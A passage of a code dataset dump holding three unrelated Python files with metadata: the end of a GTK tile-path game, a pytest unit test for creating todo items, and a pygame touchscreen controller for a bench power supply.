tile, tile_path, test_path, direction,\n neighbor):\n ''' Are we connected to a neighbor's path? If so, add the neighbor\n to our paths list and to the list of tiles that need to be tested. '''\n if self.grid.grid[tile].paths[tile_path][direction] == 1:\n if self.grid.grid[neighbor] is not None:\n if not neighbor in self._paths[test_path]:\n # Which of the neighbor's paths are we connecting to?\n if self.grid.grid[neighbor].paths[0][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 0, test_path)\n elif len(self.grid.grid[neighbor].paths) == 2 and \\\n self.grid.grid[neighbor].paths[1][\n (direction + 2) % 4] == 1:\n self._add_to_path_list(neighbor, 1, test_path)\n return True\n\n def _test_for_bad_paths(self, tile):\n ''' Is there a path to nowhere? '''\n self._hide_errormsgs()\n self._there_are_errors = False\n if tile is not None:\n self._check_tile(tile, [int(tile / COL), 0], NORTH,\n tile + OFFSETS[0])\n self._check_tile(tile, [tile % ROW, ROW - 1], EAST,\n tile + OFFSETS[1])\n self._check_tile(tile, [int(tile / COL), COL - 1], SOUTH,\n tile + OFFSETS[2])\n self._check_tile(tile, [tile % ROW, 0], WEST, tile + OFFSETS[3])\n\n def _check_tile(self, i, edge_check, direction, neighbor):\n ''' Can a tile be placed at position i? '''\n if edge_check[0] == edge_check[1]:\n for path in self.grid.grid[i].paths:\n if path[direction] == 1:\n self._display_errormsg(i, direction)\n else:\n if self.grid.grid[neighbor] is not None:\n my_path = 0\n your_path = 0\n for c in self.grid.grid[i].paths:\n if c[direction] == 1:\n my_path = 1\n for c in self.grid.grid[neighbor].paths:\n if c[(direction + 2) % 4] == 1:\n your_path = 1\n if my_path != your_path:\n self._display_errormsg(i, direction)\n\n def _display_errormsg(self, i, direction):\n ''' Display an error message where and when appropriate. '''\n if self._press is not None:\n dxdy = [[0.375, -0.125], [0.875, 0.375], [0.375, 0.875],\n [-0.125, 0.375]]\n x, y = self._press.get_xy()\n self._errormsg[direction].move(\n (x + dxdy[direction][0] * self.tile_width,\n y + dxdy[direction][1] * self.tile_height))\n self._errormsg[direction].set_layer(OVER_THE_TOP)\n self._there_are_errors = True\n\n def _hide_errormsgs(self):\n ''' Hide all the error messages. '''\n for i in range(4):\n self._errormsg[i].move((self.grid.left, self.grid.top))\n self._errormsg[i].set_layer(HIDE)\n\n def _hide_highlight(self):\n ''' No tile is selected. '''\n for i in range(4):\n self._highlight[i].move((self.grid.left, self.grid.top))\n self._highlight[i].set_layer(HIDE)\n\n def _move_relative_highlight(self, pos):\n for i in range(4):\n self._highlight[i].move_relative(pos)\n\n def _move_highlight(self, pos):\n x, y = pos\n self._highlight[0].move((x, y))\n self._highlight[1].move((x + 7 * self.tile_width / 8, y))\n self._highlight[2].move((x + 7 * self.tile_width / 8,\n y + 7 * self.tile_height / 8))\n self._highlight[3].move((x, y + 7 * self.tile_height / 8))\n\n def _show_highlight(self, pos=None):\n ''' Highlight the tile that is selected. '''\n if self.last_spr_moved is None and pos is None:\n self._hide_highlight()\n else:\n if pos is None:\n x, y = self.last_spr_moved.get_xy()\n else: # Giving a hint.\n x, y = pos\n self._move_highlight((x, y))\n for i in range(4):\n self._highlight[i].set_layer(OVER_THE_TOP)\n\n def _keypress_cb(self, area, event):\n return True\n\n def _draw_cb(self, win, context):\n ''' Callback to handle window expose events '''\n self.do_draw(context)\n return True\n\n def do_draw(self, cr):\n ''' Handle the expose-event by drawing '''\n # Restrict Cairo to the exposed area\n alloc = self._canvas.get_allocation()\n\n cr.rectangle(alloc.x, alloc.y, alloc.width, alloc.height)\n cr.clip()\n # Refresh sprite list\n self._sprites.redraw_sprites(cr=cr)\n\n def _destroy_cb(self, win, event):\n Gtk.main_quit()\n\n", "repo_name": "sugarlabs/paths", "sub_path": "game.py", "file_name": "game.py", "file_ext": "py", "file_size_in_byte": 30963, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "sugar3.graphics.style.GRID_CELL_SIZE", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sugar3.graphics.style", "line_number": 7, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 22, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 43, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 44, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 44, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.EventMask", "line_number": 45, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 45, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.width", "line_number": 52, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 52, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 52, "usage_type": "name"}, {"api_name": "gi.repository.Gdk.Screen.height", "line_number": 53, "usage_type": "call"}, {"api_name": "gi.repository.Gdk.Screen", "line_number": 53, "usage_type": "attribute"}, {"api_name": "gi.repository.Gdk", "line_number": 53, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 54, "usage_type": "name"}, {"api_name": "constants.TILE_WIDTH", "line_number": 55, "usage_type": "name"}, {"api_name": "constants.TILE_HEIGHT", "line_number": 56, "usage_type": "name"}, {"api_name": "sprites.Sprites", "line_number": 59, "usage_type": "call"}, {"api_name": "grid.Grid", "line_number": 60, "usage_type": "call"}, {"api_name": "deck.Deck", "line_number": 63, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 66, "usage_type": "call"}, {"api_name": "tile.error_graphic", "line_number": 69, "usage_type": "call"}, {"api_name": "tile.highlight_graphic", "line_number": 70, "usage_type": "call"}, {"api_name": "tile.blank_tile", "line_number": 71, "usage_type": "call"}, {"api_name": "hand.clear", "line_number": 91, "usage_type": "call"}, {"api_name": "constants.HIDE", "line_number": 110, "usage_type": "argument"}, {"api_name": "hand.Hand", "line_number": 142, "usage_type": "call"}, {"api_name": "hand.Hand", "line_number": 149, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 172, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 174, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 189, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 190, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 202, "usage_type": "call"}, {"api_name": "constants.COL", "line_number": 208, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 214, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.json_dump", "line_number": 236, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 244, "usage_type": "argument"}, {"api_name": "gettext.gettext", "line_number": 247, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 250, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 279, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 280, "usage_type": "call"}, {"api_name": "constants.TOP", "line_number": 321, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 360, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 365, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tile.number", "line_number": 374, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 383, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 384, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 393, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 393, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 414, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 414, "usage_type": "attribute"}, {"api_name": "tile.rotate_clockwise", "line_number": 424, "usage_type": "call"}, {"api_name": "tile.orientation", "line_number": 425, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 428, "usage_type": "attribute"}, {"api_name": "tile.spr", "line_number": 429, "usage_type": "attribute"}, {"api_name": "tile.spr.move", "line_number": 437, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 437, "usage_type": "attribute"}, {"api_name": "constants.COL", "line_number": 448, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 448, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 468, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 468, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 472, "usage_type": "call"}, {"api_name": "tile.get_value", "line_number": 481, "usage_type": "call"}, {"api_name": "gettext.gettext", "line_number": 484, "usage_type": "call"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 486, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 491, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 504, "usage_type": "name"}, {"api_name": "constants.GRID", "line_number": 506, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 508, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 512, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 517, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 520, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 524, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 528, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 534, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 535, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 535, "usage_type": "name"}, {"api_name": "gettext.gettext", "line_number": 545, "usage_type": "call"}, {"api_name": "constants.ROW", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 550, "usage_type": "name"}, {"api_name": "constants.ROW", "line_number": 551, "usage_type": "name"}, {"api_name": "constants.COL", "line_number": 551, "usage_type": "name"}, {"api_name": "tile.spr.move", "line_number": 558, "usage_type": "call"}, {"api_name": "tile.spr", "line_number": 558, "usage_type": "attribute"}, {"api_name": "tile.spr.set_layer", "line_number": 559, "usage_type": "call"}, {"api_name": "constants.TILES", "line_number": 559, "usage_type": "argument"}, {"api_name": "tile.spr", "line_number": 559, "usage_type": "attribute"}, {"api_name": "gettext.gettext", "line_number": 564, "usage_type": "call"}, {"api_name": "tile.rotate_clockwise", "line_number": 575, "usage_type": "call"}, {"api_name": "constants.NORTH", "line_number": 677, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 677, "usage_type": "name"}, {"api_name": "constants.EAST", "line_number": 679, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 679, "usage_type": "name"}, {"api_name": "constants.SOUTH", "line_number": 681, "usage_type": "argument"}, {"api_name": "constants.COL", "line_number": 681, "usage_type": "name"}, {"api_name": "constants.WEST", "line_number": 683, "usage_type": "argument"}, {"api_name": "constants.ROW", "line_number": 683, "usage_type": "name"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 713, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 720, "usage_type": "argument"}, {"api_name": "constants.HIDE", "line_number": 726, "usage_type": "argument"}, {"api_name": "constants.OVER_THE_TOP", "line_number": 751, "usage_type": "argument"}, {"api_name": "gi.repository.Gtk.main_quit", "line_number": 772, "usage_type": "call"}, {"api_name": "gi.repository.Gtk", "line_number": 772, "usage_type": "name"}]}
+{"seq_id": "16147226662", "text": "import pytest\nfrom unittest import mock\nimport uuid\n\nfrom src.application.todo.CreateTodo import CreateTodo\nfrom src.domain.user.errors import UserNotFoundError\n\n\n@pytest.fixture\ndef todo():\n return {\n 'uid': 'test',\n 'content': 'test content'\n }\n\n\ndef test_create_todo(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n id = str(uuid.uuid4())\n repo.generate_id.return_value = id\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n result = create_todo(inputs)\n repo.persist.assert_called_once_with({\n 'uid': todo['uid'],\n 'content': todo['content'],\n 'id': id\n })\n repo.generate_id.assert_called_once()\n user_repo.exists.assert_called_once()\n user_repo.add_todo.assert_called_once_with(todo['uid'], id)\n assert result.content == todo['content']\n assert result.id == id\n\n\ndef test_should_fail_if_user_does_not_exist(todo):\n repo = mock.Mock()\n user_repo = mock.Mock()\n user_repo.exists.return_value = False\n create_todo = CreateTodo(repo, user_repo)\n inputs = CreateTodo.Inputs(**todo)\n with pytest.raises(UserNotFoundError):\n create_todo(inputs)\n", "repo_name": "juansensio/architecture", "sub_path": "src/tests/unit/test_create_todo.py", "file_name": "test_create_todo.py", "file_ext": "py", "file_size_in_byte": 1185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "unittest.mock.Mock", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 19, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 20, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 22, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 23, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 23, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 38, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.mock.Mock", "line_number": 39, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 39, "usage_type": "name"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 41, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo.Inputs", "line_number": 42, "usage_type": "call"}, {"api_name": "src.application.todo.CreateTodo.CreateTodo", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest.raises", "line_number": 43, "usage_type": "call"}, {"api_name": "src.domain.user.errors.UserNotFoundError", "line_number": 43, "usage_type": "argument"}]}
+{"seq_id": "71679802087", "text": "#!/usr/bin/env python\nimport time\nimport serial\n\nimport pygame\n\nfrom pygame.locals import *\nfrom ui import widgets, surface\nimport psu\n\nimport random\n\n\nclass PresetScreen(object):\n def __init__(self, display, psu, parent):\n self.display = display\n self.parent = parent\n self.psu = psu\n self.active = False\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Select preset\", 2, 2, 318, 238)\n\n frame.addWidget(widgets.Button, \"3.3 / -3.3\", 2, 2, 120, 40,\n self.setPreset(3300))\n frame.addWidget(widgets.Button, \"5 / -5\", 2, 47, 120, 40,\n self.setPreset(5000))\n frame.addWidget(widgets.Button, \"9 / -9\", 2, 92, 120, 40,\n self.setPreset(9000))\n frame.addWidget(widgets.Button, \"12 / -12\", 2, 137, 120, 40,\n self.setPreset(12000))\n frame.addWidget(widgets.Button, \"15 / -15\", 2, 182, 120, 40,\n self.setPreset(15000))\n\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setVoltage(self, voltage):\n self.active = False\n self.psu.setVoltage(1, voltage)\n self.psu.setVoltage(2, -1 * voltage)\n\n def setPreset(self, voltage):\n return lambda: self.setVoltage(voltage)\n\n def cancel(self):\n self.active = False\n\n def activate(self):\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\n\nclass ConfigScreen(object):\n def __init__(self, display, psu, channel, parent, negative=False):\n self.display = display\n self.channel = channel\n self.parent = parent\n self.psu = psu\n self.active = False\n self.negative = negative\n\n self.screen = widgets.Pannel(display)\n\n frame = self.screen.addWidget(widgets.Frame,\n \"Voltage\", 2, 2, 150, 155)\n self.vdisp = frame.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=2, colour=widgets.Colours.electric_blue)\n \n bw = 28\n frame.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setVDisp(1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setVDisp(0.1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setVDisp(-1),\n colour=widgets.Colours.electric_blue)\n frame.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setVDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n\n cframe = self.screen.addWidget(widgets.Frame,\n \"Current\", 162, 2, 150, 155)\n self.cdisp = cframe.addWidget(widgets.SevenSegment, 5, 37, 143, 60,\n digits=3, msd=1, colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.UpButton, 12, 4, bw, bw, self.setCDisp(1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 59, 4, bw, bw, self.setCDisp(0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.UpButton, 106, 4, bw, bw, self.setCDisp(0.01),\n colour=widgets.Colours.electric_blue)\n\n cframe.addWidget(widgets.DownButton, 12, 100, bw, bw, self.setCDisp(-1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 59, 100, bw, bw, self.setCDisp(-0.1),\n colour=widgets.Colours.electric_blue)\n cframe.addWidget(widgets.DownButton, 106, 100, bw, bw, self.setCDisp(-0.01),\n colour=widgets.Colours.electric_blue)\n\n self.screen.addWidget(widgets.Button, \"Save\", 140, 190, 80, 40, self.save)\n self.screen.addWidget(widgets.Button, \"Cancel\", 230, 190, 80, 40, self.cancel)\n\n def setMax(self, disp, inc, mx):\n disp.value += inc\n\n if disp.value > mx:\n disp.value = mx\n if disp.value < 0:\n disp.value = 0\n\n def save(self):\n self.psu.setCurrent(self.channel, int(self.cdisp.value*1000))\n self.psu.setVoltage(self.channel, int(self.vdisp.value*1000))\n self.active = False\n\n def cancel(self):\n self.active = False\n\n def setVDisp(self, inc):\n return lambda: self.setMax(self.vdisp, inc, 15) \n\n def setCDisp(self, inc):\n return lambda: self.setMax(self.cdisp, inc, 1.5) \n\n def activate(self):\n self.vdisp.value = self.psu.vset[self.channel - 1]/1000.0\n self.cdisp.value = self.psu.cset[self.channel - 1]/1000.0\n self.active = True\n self.display.clear()\n self.screen.draw()\n self.mainLoop()\n\n def mainLoop(self):\n while self.active:\n self.screen.update()\n\n self.parent.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.screen.sendEvent(event)\n self.parent.activate()\n\nclass PowerSupply(object):\n def __init__(self, display, ser):\n self.display = display\n self.psu = psu.PSU(ser)\n self.maxV = 16\n\n self.mainScreen = widgets.Pannel(display)\n self.configScreen1 = ConfigScreen(display, self.psu, 1, self)\n self.configScreen2 = ConfigScreen(display, self.psu, 2, self, True)\n self.presetScreen = PresetScreen(display, self.psu, self)\n\n self.screen = self.mainScreen\n\n self.mainScreen.addWidget(widgets.Button, \"Presets\", 225, 138, 90, 40,\n callback=self.openPresets)\n\n self.ite = self.mainScreen.addWidget(widgets.ToggleButton, \"Main On\",\n \"Main Off\", 225, 190, 90, 40, callback=self.togglePower)\n\n # Channel 1\n ch1 = self.mainScreen.addWidget(widgets.Frame, \"Channel 1\", 1, 1, 220, 110)\n self.posv = ch1.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n self.posc = ch1.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch1.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig1)\n\n # Channel 2\n ch2 = self.mainScreen.addWidget(widgets.Frame, \"Channel 2\", 1, 120, 220, 110)\n self.negv = ch2.addWidget(widgets.FancyGauge,\n 1, 3, 40,\n units=\"Volts\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"-%.2f\",\n maxScale=self.maxV\n )\n self.negc = ch2.addWidget(widgets.FancyGauge,\n 85, 3, 40,\n units=\"Amps\",\n colour=widgets.Colours.electric_blue,\n valueFormat=\"%.2f\",\n maxScale=self.maxV\n )\n ch2.addWidget(widgets.Button, \"Setup\", 172, 52, 40, 30,\n callback=self.btnConfig2)\n\n # PDU frame\n pdu = self.mainScreen.addWidget(widgets.Frame, \"PDU\", 225, 1, 90, 110)\n\n # Toggle buttons \n self.toggle_widgets = [\n ch1.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn1),\n ch2.addWidget(widgets.ToggleButton,\n \"On\", \"Off\", 172, 10, 40, 30, callback=self.btnEn2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 1\", \"AC 1\", 10, 10, 30, 30, callback=self.btnAc1),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 2\", \"AC 2\", 50, 10, 30, 30, callback=self.btnAc2),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 3\", \"AC 3\", 10, 50, 30, 30, callback=self.btnAc3),\n pdu.addWidget(widgets.ToggleButton,\n \"AC 4\", \"AC 4\", 50, 50, 30, 30, callback=self.btnAc4),\n ]\n\n self.clock = pygame.time.Clock()\n self.c = time.time()\n self.long_c = time.time()\n self.active = False\n\n self.ncvals = []\n self.pcvals = []\n\n self.activate()\n\n def activate(self):\n self.display.clear()\n self.mainScreen.draw()\n if not self.active:\n self.active = True\n self.mainLoop()\n\n def togglePower(self, state):\n self.psu.toggleInput(state)\n\n def openPresets(self):\n self.presetScreen.activate()\n\n def btnConfig1(self):\n self.configScreen1.activate()\n\n def btnConfig2(self):\n self.configScreen2.activate()\n\n def btnEn1(self, state):\n if not state:\n self.psu.outputEnable(1)\n else:\n self.psu.outputDisable(1)\n\n def btnEn2(self, state):\n if not state:\n self.psu.outputEnable(2)\n else:\n self.psu.outputDisable(2)\n\n def btnAc1(self, state):\n if state:\n self.psu.acEnable(1)\n else:\n self.psu.acDisable(1)\n\n def btnAc2(self, state):\n if state:\n self.psu.acEnable(2)\n else:\n self.psu.acDisable(2)\n\n def btnAc3(self, state):\n if state:\n self.psu.acEnable(3)\n else:\n self.psu.acDisable(3)\n\n def btnAc4(self, state):\n if state:\n self.psu.acEnable(4)\n else:\n self.psu.acDisable(4)\n\n def tick(self):\n self.psu.tick()\n\n def slowTick(self):\n self.psu.updateState()\n self.ite.setState(self.psu.transformer)\n self.posv.value = self.psu.voltageP/1000.0\n if self.psu.currentP >= 0:\n self.pcvals.append(self.psu.currentP/1000.0)\n self.posc.value = max(self.pcvals)\n if len(self.pcvals) > 5:\n self.pcvals.pop(0)\n \n self.negv.value = -1*(self.psu.voltageN/1000.0)\n\n if self.psu.currentN >= 0:\n self.ncvals.append(self.psu.currentN/1000.0)\n self.negc.value = max(self.ncvals)\n if len(self.ncvals) > 5:\n self.ncvals.pop(0)\n\n q = False\n\n for i, w in enumerate(self.toggle_widgets):\n q = q or w.setState(self.psu.state_ar[i])\n\n if q:\n self.mainScreen.display.flip()\n\n def mainLoop(self):\n while self.active:\n self.mainScreen.update()\n\n if (time.time() - self.c > 0.02):\n self.c = time.time()\n self.tick()\n\n if (time.time() - self.long_c > 0.3):\n self.long_c = time.time()\n self.slowTick()\n\n self.clock.tick(40)\n\n for event in pygame.event.get():\n if event.type in (QUIT, KEYDOWN):\n self.active = False\n\n self.mainScreen.sendEvent(event)\n\nif __name__ == '__main__': \n ser = serial.Serial('/dev/serial0', 57600)\n #ser = psu.FakePSU(None, None)\n mypsu = PowerSupply(surface.TouchScreen(), ser)\n #mypsu = PowerSupply(surface.Dev(), ser)\n mypsu.activate()\n", "repo_name": "calston/piwerlab", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 11450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Pannel", "line_number": 21, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 21, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 23, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 26, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 28, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 30, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 30, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 32, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 32, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 34, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 34, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 37, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 37, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 62, "usage_type": "attribute"}, {"api_name": "ui.widgets.Pannel", "line_number": 79, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 79, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 81, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 81, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 83, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 83, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 84, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 84, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 87, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 87, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 88, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 88, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 89, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 89, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 90, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 90, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 91, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 91, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 92, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 92, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 93, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 94, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 94, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 96, "usage_type": "name"}, {"api_name": "ui.widgets.SevenSegment", "line_number": 98, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 98, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 99, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 99, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 101, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 101, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 102, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 103, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 103, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 104, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 104, "usage_type": "name"}, {"api_name": "ui.widgets.UpButton", "line_number": 105, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 105, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 106, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 106, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 108, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 108, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 109, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 110, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 110, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 111, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 111, "usage_type": "name"}, {"api_name": "ui.widgets.DownButton", "line_number": 112, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 112, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 113, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 113, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 115, 